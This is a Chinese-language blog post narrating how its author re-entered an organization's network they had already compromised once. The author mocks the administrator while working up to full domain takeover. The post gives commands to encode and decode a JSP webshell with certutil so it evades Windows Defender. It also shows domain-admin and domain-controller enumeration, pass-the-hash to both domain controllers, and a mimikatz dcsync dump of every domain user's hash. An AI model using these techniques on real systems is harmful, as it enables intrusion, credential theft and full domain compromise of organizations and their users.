<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言这个目标之前已经打穿了，当时已经拿到了域控权限，然后管理员把站关掉了，今天整理笔记，突然心血来潮，又去看了一下这个站，发现它又恢复了…..  复测发现该站加了杀软，不能直接上线cs了，不过这都是小问题，管理员以为有个杀软就能不被日了？太年轻了，掏出三板斧就是一顿干，当我日进内网那一刻，我发现它啥都没变，还是熟悉的味道，熟悉的配方……  正文通过jboss反序列化获得一个入口权限，上次打的时候还">
<meta property="og:type" content="article">
<meta property="og:title" content="梅开二度之旧站新开 - 从外网RCE到内网域控">
<meta property="og:url" content="http://example.com/posts/1/index.html">
<meta property="og:site_name" content="Brich">
<meta property="og:description" content="前言这个目标之前已经打穿了，当时已经拿到了域控权限，然后管理员把站关掉了，今天整理笔记，突然心血来潮，又去看了一下这个站，发现它又恢复了…..  复测发现该站加了杀软，不能直接上线cs了，不过这都是小问题，管理员以为有个杀软就能不被日了？太年轻了，掏出三板斧就是一顿干，当我日进内网那一刻，我发现它啥都没变，还是熟悉的味道，熟悉的配方……  正文通过jboss反序列化获得一个入口权限，上次打的时候还">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gimg2.baidu.com/image_search/src=http%3A%2F%2F5b0988e595225.cdn.sohucs.com%2Fq_70%2Cc_zoom%2Cw_640%2Fimages%2F20181213%2F825c81a7bb384128be49e7e499b8e78d.jpeg&refer=http%3A%2F%2F5b0988e595225.cdn.sohucs.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=auto?sec=1650453712&t=f808303178f23ea1447055469344dce6">
<meta property="og:image" content="https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fimg.julinghu.com%2F2021%2F09%2F20210922001853559.jpg&refer=http%3A%2F%2Fimg.julinghu.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=auto?sec=1650454026&t=e24f47a699a7778246414180a317f0d3">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404134648845.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404144526134.png">
<meta property="og:image" content="https://img0.baidu.com/it/u=1612249915,2074564743&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=432">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404140036343.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404140329481.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404141109490.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404141149119.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404141447856.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404141638083.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404142032452.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404142056562.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404142242001.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404145725535.png">
<meta property="og:image" content="https://img2.baidu.com/it/u=880027713,2533080897&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=441">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404145918208.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404150707864.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404161841193.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404162614299.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404172901870.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404172215237.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404172601073.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/image-20220404193814637.png">
<meta property="article:published_time" content="2022-05-07T15:31:01.000Z">
<meta property="article:modified_time" content="2022-05-07T15:14:57.704Z">
<meta property="article:author" content="1in3r">
<meta property="article:tag" content="内网渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gimg2.baidu.com/image_search/src=http%3A%2F%2F5b0988e595225.cdn.sohucs.com%2Fq_70%2Cc_zoom%2Cw_640%2Fimages%2F20181213%2F825c81a7bb384128be49e7e499b8e78d.jpeg&refer=http%3A%2F%2F5b0988e595225.cdn.sohucs.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=auto?sec=1650453712&t=f808303178f23ea1447055469344dce6">
    
    
      
        
          <link rel="shortcut icon" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
      
        
          <link rel="icon" type="image/png" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
    
    <!-- title -->
    <title>梅开二度之旧站新开 - 从外网RCE到内网域控</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/posts/1632241034/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/posts/336723263/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/posts/1/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/posts/1/&text=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/posts/1/&is_video=false&description=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=梅开二度之旧站新开 - 从外网RCE到内网域控&body=Check out this article: http://example.com/posts/1/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/posts/1/&name=梅开二度之旧站新开 - 从外网RCE到内网域控&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/posts/1/&t=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-%E6%9D%80%E8%BD%AF"><span class="toc-number">3.</span> <span class="toc-text">Bypass 杀软</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Cobalt-Strike-%E4%B8%8A%E7%BA%BF"><span class="toc-number">4.</span> <span class="toc-text">Cobalt Strike 上线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.</span> <span class="toc-text">域信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9A%E4%BD%8DDC"><span class="toc-number">5.1.</span> <span class="toc-text">定位DC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F"><span class="toc-number">5.2.</span> <span class="toc-text">内网存活主机扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81"><span class="toc-number">5.3.</span> <span class="toc-text">本地管理员密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DC%E6%A8%AA%E5%90%91%E4%B8%8A%E7%BA%BF"><span class="toc-number">6.</span> <span class="toc-text">DC横向上线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#All-In"><span class="toc-number">7.</span> <span class="toc-text">All In</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E5%86%85%E6%89%80%E6%9C%89%E7%94%A8%E6%88%B7hash"><span class="toc-number">8.</span> <span class="toc-text">域内所有用户hash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">9.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        梅开二度之旧站新开 - 从外网RCE到内网域控
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">1in3r</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-05-07T15:31:01.000Z" itemprop="datePublished">2022-05-07</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这个目标之前已经打穿了，当时已经拿到了域控权限，然后管理员把站关掉了，今天整理笔记，突然心血来潮，又去看了一下这个站，发现它又恢复了…..</p>
<p><img src="https://gimg2.baidu.com/image_search/src=http%3A%2F%2F5b0988e595225.cdn.sohucs.com%2Fq_70%2Cc_zoom%2Cw_640%2Fimages%2F20181213%2F825c81a7bb384128be49e7e499b8e78d.jpeg&refer=http%3A%2F%2F5b0988e595225.cdn.sohucs.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=auto?sec=1650453712&t=f808303178f23ea1447055469344dce6"></p>
<p>复测发现该站加了杀软，不能直接上线cs了，不过这都是小问题，管理员以为有个杀软就能不被日了？太年轻了，掏出三板斧就是一顿干，当我日进内网那一刻，我发现它啥都没变，还是熟悉的味道，熟悉的配方……</p>
<p><img src="https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fimg.julinghu.com%2F2021%2F09%2F20210922001853559.jpg&refer=http%3A%2F%2Fimg.julinghu.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=auto?sec=1650454026&t=e24f47a699a7778246414180a317f0d3"></p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>通过jboss反序列化获得一个入口权限，上次打的时候还没有杀软的，这次竟然有杀软了，所以powershell不能直接上线，我是菜鸡又不会免杀呜呜呜呜，那就只能采用最朴素的方式。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> c:\ &amp;&amp; <span class="built_in">dir</span> /S  *.jsp &gt; res.txt <span class="comment">#用这个方法找网站根目录，防止输出数据过多，所以选择输出内容重定向到文件中</span></span><br></pre></td></tr></table></figure>

<p>别问我为啥不部署war包getshell，我第一次打的时候是可以部署的，后来管理员好像修复掉了（这个站下线过一段时间），我这次部署war包，发现部署不上去了，但是这个站还有反序列化漏洞可以利用。</p>
<p>朴素地得到网站根路径</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404134648845.png" alt="image-20220404134648845"></p>
<h2 id="Bypass-杀软"><a href="#Bypass-杀软" class="headerlink" title="Bypass 杀软"></a>Bypass 杀软</h2><p>windows defender</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404144526134.png" alt="image-20220404144526134"></p>
<p>使用windows自带工具certutil编码webshell之后再echo到网站根目录下解码即可</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil <span class="literal">--encode</span>  webshell.jsp webshell.txt <span class="comment">#编码webshell</span></span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> “webshellxxxxxxxx” &gt; /path/shell.txt <span class="comment"># 内容过长的话，可以分次echo，使用&gt;&gt;追加</span></span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil <span class="literal">--decode</span>  shell.txt shell.jsp <span class="comment">#解码webshell</span></span><br></pre></td></tr></table></figure>

<p>这种方式可以绕过一些垃圾的杀软，如果有大佬会powershell免杀，希望可以教教我，希望你不要不识好歹。</p>
<p><img src="https://img0.baidu.com/it/u=1612249915,2074564743&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=432"></p>
<p>冰蝎连接，上来就是system权限，省的提权了</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404140036343.png" alt="image-20220404140036343"></p>
<h2 id="Cobalt-Strike-上线"><a href="#Cobalt-Strike-上线" class="headerlink" title="Cobalt Strike 上线"></a>Cobalt Strike 上线</h2><p>随便免杀一下就上线了cs</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404140329481.png" alt="image-20220404140329481"></p>
<p>抓明文密码，抓到几个域用户以及本地管理员的hash</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404141109490.png" alt="image-20220404141109490"></p>
<p>Dump hash</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404141149119.png" alt="image-20220404141149119"></p>
<h2 id="域信息收集"><a href="#域信息收集" class="headerlink" title="域信息收集"></a>域信息收集</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404141447856.png" alt="image-20220404141447856"></p>
<p>查询域管</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net <span class="built_in">group</span> <span class="string">&quot;domain admins&quot;</span> /domain</span><br></pre></td></tr></table></figure>

<p>存在两个域管用户</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404141638083.png" alt="image-20220404141638083"></p>
<h3 id="定位DC"><a href="#定位DC" class="headerlink" title="定位DC"></a>定位DC</h3><p>查询主域控制器</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net <span class="built_in">group</span> <span class="string">&quot;Domain Controllers&quot;</span> /domain</span><br></pre></td></tr></table></figure>

<p>两个域控制器</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404142032452.png" alt="image-20220404142032452"></p>
<p>查询主域控制器</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netdom query pdc</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404142056562.png" alt="image-20220404142056562"></p>
<p>查询DC主机名以及DC ip地址</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Nslookup <span class="literal">-type</span>=SRV _ldap._tcp</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404142242001.png" alt="image-20220404142242001"></p>
<h3 id="内网存活主机扫描"><a href="#内网存活主机扫描" class="headerlink" title="内网存活主机扫描"></a>内网存活主机扫描</h3><p>机器还是非常多的</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404145725535.png" alt="image-20220404145725535"></p>
<p>我上传的东西都会被杀，这很windows defender，所以我打算…..</p>
<p><img src="https://img2.baidu.com/it/u=880027713,2533080897&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=441"></p>
<h3 id="本地管理员密码"><a href="#本地管理员密码" class="headerlink" title="本地管理员密码"></a>本地管理员密码</h3><p>我只能说这个密码很标准，不然我还能说什么，想必这个管理员一定有很多年的从业经验，所以他才能设置出这么复杂、这么有脑洞的密码</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404145918208.png" alt="image-20220404145918208"></p>
<p>我就socks代理直接上3389关闭杀软，我真的受不了了</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404150707864.png" alt="image-20220404150707864"></p>
<p>mlgb的太卡了,遂放弃….</p>
<h2 id="DC横向上线"><a href="#DC横向上线" class="headerlink" title="DC横向上线"></a>DC横向上线</h2><p>上次渗透测试记住了DC的域管hash，直接横向一波看看有无惊喜,结果一发入魂</p>
<p>192.168.0.254 DC1</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404161841193.png" alt="image-20220404161841193"></p>
<p>192.168.0.254 DC2</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404162614299.png" alt="image-20220404162614299"></p>
<h2 id="All-In"><a href="#All-In" class="headerlink" title="All In"></a>All In</h2><p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404172901870.png" alt="image-20220404172901870"></p>
<h2 id="域内所有用户hash"><a href="#域内所有用户hash" class="headerlink" title="域内所有用户hash"></a>域内所有用户hash</h2><p>几百个用户吧，小环境</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz  @lsadump::dcsync /domain:xxxxx.loxxx /all /csv</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404172215237.png" alt="image-20220404172215237"></p>
<p>域内计算机列表，大概百来台机器的样子，只拿下了几台服务器，根据命名规则推测数字结尾的机器应该是办公区的员工PC，大部分都是不存活状态，估计下班关机了</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404172601073.png" alt="image-20220404172601073"></p>
<p>内网比较小，一眼看到头的那种</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/image-20220404193814637.png" alt="image-20220404193814637"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>我是菜狗。</p>

  </div>
</article>






        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/vlog/">vlog</a></li>
         
          <li><a href="/gallery/">Photo</a></li>
         
          <li><a href="/friends/">Friends</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-%E6%9D%80%E8%BD%AF"><span class="toc-number">3.</span> <span class="toc-text">Bypass 杀软</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Cobalt-Strike-%E4%B8%8A%E7%BA%BF"><span class="toc-number">4.</span> <span class="toc-text">Cobalt Strike 上线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.</span> <span class="toc-text">域信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9A%E4%BD%8DDC"><span class="toc-number">5.1.</span> <span class="toc-text">定位DC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F"><span class="toc-number">5.2.</span> <span class="toc-text">内网存活主机扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81"><span class="toc-number">5.3.</span> <span class="toc-text">本地管理员密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DC%E6%A8%AA%E5%90%91%E4%B8%8A%E7%BA%BF"><span class="toc-number">6.</span> <span class="toc-text">DC横向上线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#All-In"><span class="toc-number">7.</span> <span class="toc-text">All In</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E5%86%85%E6%89%80%E6%9C%89%E7%94%A8%E6%88%B7hash"><span class="toc-number">8.</span> <span class="toc-text">域内所有用户hash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">9.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/posts/1/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/posts/1/&text=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/posts/1/&is_video=false&description=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=梅开二度之旧站新开 - 从外网RCE到内网域控&body=Check out this article: http://example.com/posts/1/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/posts/1/&title=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/posts/1/&name=梅开二度之旧站新开 - 从外网RCE到内网域控&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/posts/1/&t=梅开二度之旧站新开 - 从外网RCE到内网域控"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2022
    1in3r
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


